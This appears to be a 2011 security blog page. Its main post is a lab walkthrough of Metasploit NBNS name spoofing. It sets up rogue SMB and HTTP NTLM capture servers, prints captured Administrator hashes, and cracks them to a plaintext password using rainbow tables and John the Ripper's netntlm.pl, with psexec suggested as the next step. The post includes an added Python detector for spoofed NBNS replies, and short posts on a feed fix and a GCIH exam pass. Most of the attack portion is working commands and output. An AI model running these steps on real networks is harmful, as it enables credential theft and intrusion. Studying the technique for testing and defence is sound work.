For a while now I had been meaning to check why the feeds were not flowing out. So I spent a few hours tonight [ it's morning now, GM ] and realized there had been a sort of loop issue between the Google feed setting vis-a-vis FeedBurner.
The feed URL is fixed now and I've added a 'Subscribe' link at the bottom left of the blog. You can subscribe to iPositiveSecurity using your favourite feed reader.
I'll sign off now.
Take Good Care of yourself, people!
Wednesday, April 20, 2011
Friday, April 15, 2011
Metasploit NBNS Auxiliary FTW
Metasploit's NBNS auxiliary module in action. I will be using Metasploit Express for the exercise. The objective is to gain access to the victim's password.
This video is based on Packetstan's awesome tutorial. Do check it out here for full details:
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
Let's begin.
First we start the Metasploit auxiliary NBNS module:
auxiliary/spoof/nbns/nbns_response
NBNS queries are sent out as broadcasts. So we will now intercept the requests and send our spoofed NBNS responses to the victim. This will poison the name lookup.
msf auxiliary(nbns_response) > show options
Module options (auxiliary/spoof/nbns/nbns_response):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   REGEX    .*               yes       Regex applied to determene if spoofed reply is sent
   SPOOFIP  172.72.5.1       yes       IP address with which to poison responses
   VERBOSE  true             no        Determines whether to display responses
msf auxiliary(nbns_response) > run
[*] Auxiliary module execution completed
[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) >
As soon as an end-client sends out a name resolution query, our NBNS response server responds back saying it's the one the client is looking for.
[*] Packet Recieved from 172.72.5.139
[*] Regex matched PLAYGROUND1 from 172.72.5.139. Sending reply...
Now that we control name resolution, we can start rogue / fake services at our end - such as a file server [ smb ] and a web server [ http ].
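As an added example from the defender's side (not part of the original post and not Metasploit code), the Python below decodes NBNS packets like the ones the spoofer above answers and flags the behaviour it relies on: a positive reply for a name nobody owns, an answer nobody asked for, or an answer pointing at a host other than the responder. The canary name, addresses and packets are constructed for the example.

```python
import struct
from ipaddress import IPv4Address

# Canary names: queried on purpose, registered by no host (constructed list).
CANARY_NAMES = {"NOSUCHHOST01"}

def encode_nb_name(name, suffix=0x00):
    """NetBIOS first-level encoding: pad to 15 chars, add suffix byte, split nibbles."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(b for c in raw for b in ((c >> 4) + 0x41, (c & 0x0F) + 0x41))
    return b"\x20" + enc + b"\x00"
def decode_nb_name(buf, off):  # inverse of encode_nb_name -> (name, suffix, next offset)
    length, enc = buf[off], buf[off + 1:off + 1 + buf[off]]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, length, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15], off + length + 2
def parse_nbns(pkt):  # header, question/answer name, and the advertised IP for responses
    tid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    name, _suffix, off = decode_nb_name(pkt, 12)
    rec = {"id": tid, "response": bool(flags & 0x8000), "name": name, "answer_ip": None}
    if rec["response"] and an:  # after type/class: TTL, RDLENGTH, NB_FLAGS, IPv4 address
        rec["answer_ip"] = str(IPv4Address(struct.unpack("!IHH4s", pkt[off + 4:off + 16])[3]))
    return rec
def detect_spoofing(packets):
    """packets: iterable of (src_ip, raw UDP/137 payload). Returns alert strings."""
    alerts, pending = [], {}
    for src, raw in packets:
        rec = parse_nbns(raw)
        key = (rec["id"], rec["name"])
        if not rec["response"]:
            pending[key] = src  # remember who asked for which name
        elif rec["name"] in CANARY_NAMES:
            alerts.append(f"{src} answered canary {rec['name']} with {rec['answer_ip']}")
        elif key not in pending:
            alerts.append(f"{src} sent an unsolicited answer for {rec['name']}")
        elif rec["answer_ip"] != src:
            alerts.append(f"{src} claims {rec['name']} is at {rec['answer_ip']}")
    return alerts
def build_query(tid, name):  # constructed B-node broadcast query (flags: RD + B)
    hdr = struct.pack("!HHHHHH", tid, 0x0110, 1, 0, 0, 0)
    return hdr + encode_nb_name(name) + struct.pack("!HH", 0x0020, 0x0001)
def build_response(tid, name, ip):  # constructed positive name query response
    rr = encode_nb_name(name) + struct.pack("!HHIHH", 0x0020, 0x0001, 300000, 6, 0x0000)
    return struct.pack("!HHHHHH", tid, 0x8500, 0, 1, 0, 0) + rr + IPv4Address(ip).packed

SAMPLE = [  # constructed capture: an ordinary lookup, then a canary lookup that gets answered
    ("172.72.5.139", build_query(0x8001, "SERVER")),
    ("172.72.5.1", build_response(0x8001, "SERVER", "172.72.5.1")),
    ("172.72.5.139", build_query(0x8002, "NOSUCHHOST01")),
    ("172.72.5.1", build_response(0x8002, "NOSUCHHOST01", "172.72.5.1")),
]
```

Only the canary lookup fires on the sample: a single spoofed reply to a real name is indistinguishable from a legitimate one, which is why a name that no host owns is the reliable tell for a responder that matches `.*`.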
The idea is to set up these fake services, and capture the hashes when the victim attempts to access them.
Configure and start the following modules:
auxiliary/server/capture/smb
msf auxiliary(smb) > show options
Module options (auxiliary/server/capture/smb):
   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE     /tmp/smblog       no        The local filename to store the captured hashes
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > show options
Module options (auxiliary/server/capture/http_ntlm):
   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   LOGFILE     /tmp/httplog      no        The local filename to store the captured hashes
   PWFILE                        no        The local filename to store the hashes in Cain&Abel format
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80                yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                 no        The URI to use for this exploit (default is random)
When the user attempts to authenticate to / access the SMB / HTTP services, our rogue server responds and the end-client sends its hashed credentials to get authenticated.
msf auxiliary(smb) > [*] 2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a
msf auxiliary(http_ntlm) > [*] Packet Recieved from 172.72.5.139
[*] Regex matched SERVER from 172.72.5.139. Sending reply...
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058
[*] 172.72.5.139: PLAYGROUND1\Administrator 76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a on PLAYGROUND1
We have configured the logging location in the module options, and these hashes are captured in their respective log files.
root@victor:Tools# cat /tmp/smblog
2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a
root@victor:Tools# cat /tmp/httplog
2011-04-19 16:17:49 +0530:172.72.5.139:PLAYGROUND1:PLAYGROUND1:Administrator:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a
But these hashes are salted with a challenge, which means cracking them directly is not feasible. For salted hashes of this kind, we will use rainbow tables.
Download the free Rainbow tables here:
ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/
Using rcracki [ http://sourceforge.net/projects/rcracki/ ] and the rainbow tables, we now crack the first half of the LM hash. We only have to take the first 16 characters of the LM hash and use them with rcracki_mt as follows:
./rcracki_mt -h <first 16 chars of LM hash> /path/to/rainbowtables/
[ First 16 chars of LM hash in this instance -> 76365e2d142b5612 ]
So the command I run is:
./rcracki_mt -h 76365e2d142b5612 /halflmchall_all-space#1-7_0/
First portion cracked:
### output snipped ###
statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 23.17 s
total cryptanalysis time: 16.95 s
total pre-calculation time: 260.47 s
total chain walk step: 199970001
total false alarm: 1669
total chain walk step due to false alarm: 12603773
result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52
### output snipped ###
Aha.. we have got the first portion of the password [ PASSWOR ]. Now we feed this portion of the password as a seed to netntlm.pl [ found in the john install directory ]. The input file should have the hashes in john-compatible format [ from smblog ] or in the following format from httplog:
<user>:::<LMHASH>:<NTLMHASH>:<Metasploit_static_CHALLENGE>
i.e. in the format as follows ->
root@victor:Tools# cat /tmp/nbns
playground\administrator:::76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a:1122334455667788
netntlm.pl is run as follows:
./netntlm.pl --seed <first_portion> --file nbns
root@victor:run# ./netntlm.pl --seed PASSWOR --file /tmp/nbns
So we have the uppercase password -> PASSWORK
Now we have got the full password. But as we can see here, it is all uppercase. We need to run it through the previous command again - i.e.
root@victor:run# ./netntlm.pl --seed PASSWORK --file /tmp/nbns
- and we will get the password in its true case.
Performing NTLM case-sensitive crack for account: playground\administrator.
guesses: 1 time: 0:00:00:00 100.00% (ETA: Tue Apr 12 17:19:56 2011) c/s: 1163 trying: passwork
Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
passwork (playground\administrator)
We found the true-case password -> "passwork" :)
We have the password and can now use it in further attacks, such as psexec!
Metasploit NBNS Auxiliary in action from KG on Vimeo.
Metasploit's auxiliary NetBIOS name spoofer module is very convenient and effective in a pen test. Start the module, then set up fake services like smb / http, and then just lay back and watch the hashes pop up...!
Thank You for watching!
Wednesday, April 6, 2011
Passed GIAC GCIH Exam
Hey fellas,
After around a month's preparation following my GPEN pass, I sat for and passed the GIAC Incident Handling exam yesterday.
Here is the program detail:
This subject teaches Incident Handling skills and dives deep into various attack vectors. Also interesting is learning how to understand and apply this knowledge to attacks vis-a-vis the 6 Incident Handling phases.
The exam was gripping at all times, and I found a handful of pretty tricky questions in there too. I will not delve into any detail on the questions, only that you should have decent experience in most / all the topics mentioned in the syllabus as well as at least some exposure to handling events / incidents from a high level.
Here is the GCIH certification bulletin:
Day 1 today, and I am already finding this knowledge very helpful. It is comforting to be able to relate the methods and thought process of a penetration tester in confirming / exploiting security weaknesses in a customer environment with the defensive approach of an Incident Handler. This brings out all the worth of GPEN and GCIH, because it is crucial to be able to help customers' infosec / security teams understand the ways an attacker can get in as well as recommendations pertaining to each of the phases of the Incident Handling process; i.e. preparation / identification / containment / eradication / recovery and lessons learned. And lastly, and equally importantly, as a consultant you can show the playground and the game to (non-tech) executives.
What say? Go for it!
Best Regards.